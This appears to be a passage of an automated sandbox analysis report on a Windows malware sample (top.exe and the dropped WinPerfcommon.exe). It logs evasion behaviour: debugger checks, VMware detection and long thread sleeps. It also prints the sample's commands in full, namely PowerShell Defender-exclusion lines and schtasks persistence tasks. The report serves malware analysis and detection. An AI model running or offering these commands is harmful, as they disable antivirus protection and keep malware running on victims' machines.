                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost (2 occurrences)
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Memory allocated: 1000000 memory reserve | memory write watch
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Memory allocated: 1ABE0000 memory reserve | memory write watch
Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe Memory allocated: 2140000 memory reserve | memory write watch
Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe Memory allocated: 1A360000 memory reserve | memory write watch
Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe Memory allocated: C00000 memory reserve | memory write watch
Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe Memory allocated: 1A700000 memory reserve | memory write watch
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Memory allocated: 10C0000 memory reserve | memory write watch
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Memory allocated: 1AAB0000 memory reserve | memory write watch
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Memory allocated: 1140000 memory reserve | memory write watch
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Memory allocated: 1AB90000 memory reserve | memory write watch
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Thread delayed: delay time: 922337203685477 (3 occurrences)
Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (12 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2919
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2584
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4094
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2640
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3864
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2489
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\qMBWbOkw.log
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ZndYtGLf.log
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\GOHavRZK.log
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\Qxaqfufs.log
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\alFgOGaa.log
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kTYwyifI.log
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\SHwrfMKt.log
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe TID: 2108 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe TID: 2284 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe TID: 8000 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5656 Thread sleep count: 2919 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7488 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196 Thread sleep count: 2584 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236 Thread sleep count: 4094 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332 Thread sleep count: 2640 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7328 Thread sleep count: 3864 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344 Thread sleep count: 2489 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504 Thread sleep time: -922337203685477s >= -30000s
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe TID: 7604 Thread sleep time: -922337203685477s >= -30000s
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe TID: 8020 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (10 occurrences)
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe File Volume queried: C:\ FullSizeInformation (3 occurrences)
Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe File Volume queried: C:\ FullSizeInformation (2 occurrences)
Source: C:\Users\user\Desktop\top.exe Code function: 0_2_0045A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_0045A69B
Source: C:\Users\user\Desktop\top.exe Code function: 0_2_0046C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_0046C220
Source: C:\Users\user\Desktop\top.exe Code function: 0_2_0047B348 FindFirstFileExA, 0_2_0047B348
Source: C:\Users\user\Desktop\top.exe Code function: 0_2_0046E6A3 VirtualQuery,GetSystemInfo, 0_2_0046E6A3
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe File opened: C:\Users\user
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe File opened: C:\Users\user\AppData
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe File opened: C:\Users\user\AppData\Local
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: wscript.exe, 00000002.00000002.2355242317.0000000000823000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\,B
Source: wscript.exe, 00000002.00000002.2355242317.0000000000823000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: WinPerfcommon.exe, 00000006.00000002.2489839766.000000001C025000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: WinPerfcommon.exe, 00000006.00000002.2491625440.000000001C03A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Z6:
Source: WinPerfcommon.exe, 00000006.00000002.2491625440.000000001C03A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: top.exe, 00000000.00000003.2048296646.0000000002B04000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Q
Source: C:\Users\user\Desktop\top.exe API call chain: ExitProcess graph end node graph_0-25019
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\top.exe Code function: 0_2_0046F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0046F838
Source: C:\Users\user\Desktop\top.exe Code function: 0_2_00477DEE mov eax, dword ptr fs:[00000030h] 0_2_00477DEE
Source: C:\Users\user\Desktop\top.exe Code function: 0_2_0047C030 GetProcessHeap, 0_2_0047C030
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process token adjusted: Debug (3 occurrences)
Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe Process token adjusted: Debug (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug (6 occurrences)
Source: C:\Users\user\Desktop\top.exe Code function: 0_2_0046F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0046F838
Source: C:\Users\user\Desktop\top.exe Code function: 0_2_0046F9D5 SetUnhandledExceptionFilter, 0_2_0046F9D5
Source: C:\Users\user\Desktop\top.exe Code function: 0_2_0046FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0046FBCA
Source: C:\Users\user\Desktop\top.exe Code function: 0_2_00478EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00478EBD
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe'
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\SystemSettings.exe'
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msproviderBrokerMonitornet\WinPerfcommon.exe'
Source: C:\Users\user\Desktop\top.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msproviderBrokerMonitornet\qGDN1Ee4B98z7IBsvEaYenHfp3i4NGluh1QU7ALIT.vbe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msproviderBrokerMonitornet\rS0XRrLecpgQD85mPzoGJptpB8S2GwiBTdu9z4xSSrCX90wlqwqwnpzpgY0I.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\msproviderBrokerMonitornet\WinPerfcommon.exe "C:\msproviderBrokerMonitornet/WinPerfcommon.exe"
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline"
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imeik232\imeik232.cmdline"
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe'
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'" /f
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wnSgpBKJabSHvDawwFjyhiOtGEGVta" /sc ONLOGON /tr "'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'" /rl HIGHEST /f
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\emoAWdy2Gj.bat"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4FDD.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCAA8B5102F2134902BBA166DD4B5C8948.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES520F.tmp" "c:\Windows\System32\CSCBE040DD0C77A40C69F3560F59F6749C9.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
